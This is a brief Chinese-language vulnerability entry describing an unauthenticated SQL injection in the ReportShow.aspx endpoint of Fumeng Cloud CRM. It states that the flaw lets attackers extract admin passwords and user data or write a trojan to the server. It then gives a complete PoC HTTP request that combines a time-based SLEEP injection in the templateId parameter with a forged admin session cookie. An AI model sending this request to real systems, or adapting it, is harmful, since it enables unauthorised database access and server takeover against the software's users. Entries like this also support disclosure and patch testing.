漏洞描述
上海孚盟软件有限公司是一家专业的外贸SaaS服务和行业解决方案提供商。其旗下产品孚盟云ReportShow.aspx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
孚盟云CRM ReportShow.aspx SQL 注入漏洞
PoC代码
GET /m/Dingding/ActiveReport/ReportShow.aspx?templateId=1'%3BSELECT%2BSLEEP(8)%23 HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Cookie: UserCookie={"empId":"admin","corpId": "1","loginUser":"admin"}
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36